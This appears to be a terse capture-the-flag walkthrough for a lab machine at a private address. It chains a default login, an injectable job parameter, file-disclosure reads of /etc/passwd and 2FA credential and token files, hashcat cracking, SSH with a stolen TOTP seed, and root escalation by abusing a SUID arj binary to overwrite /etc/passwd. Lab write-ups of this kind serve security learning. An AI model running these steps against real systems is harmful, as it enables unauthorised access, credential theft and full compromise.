http://192.168.145.144
Basic login:
admin:admin
In page source:
<!-- itemir/apache_2fa -->
POST /checkpost.php HTTP/1.1
...
job=ps
The response:
HTTP/1.1 302 Found
Location: /index.php?workon=am9iPXBz
am9iPXBz -> Base64 decoded job=ps
View Result -> /spool/viewresult.php?view=192.168.49.145_1639874661.txt
- /viewresult.php?view=/etc/passwd
fox:x:1000:1000::/home/fox:/bin/sh
- /viewresult.php?view=/etc/apache2/apache2.conf
- /viewresult.php?view=/etc/apache2/sites-enabled/000-default.conf
AuthUserFile /opt/apache_2fa/apache_credentials
- /viewresult.php?view=/opt/apache_2fa/apache_credentials
admin:$apr1$pa.RhgPO$18S/xeIW24UvBgjVJJXiC1
fox:$apr1$[REDACTED]
$ hashcat -m 1600 -w 4 -a 0 hash.txt ~/Desktop/rockyou.txt --force
admin:admin
fox:[REDACTED]
$ ssh fox@192.168.145.144
(fox@192.168.145.144) Verification code:?
/viewresult.php?view=/opt/apache_2fa/tokens.json
{
"admin": "ND4LKCSFMUQISO6CBZQATLDP",
"fox": "[REDACTED]"
}
Add -> Manual Entry -> Use this secret:"[REDACTED]" to generate code.
$ ssh fox@192.168.145.144
(fox@192.168.145.144) Verification code:
$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/arj
$ cd /tmp
$ cp /etc/passwd passwd
$ echo "ch:\$1\$ignite\$3eTbJm98O9Hz.k1NTdNxe1:0:0:root:/root:/bin/bash" >> passwd
$ arj a priv passwd
$ arj x priv.arj /etc/
→ Yes
$su ch
Password: pass123
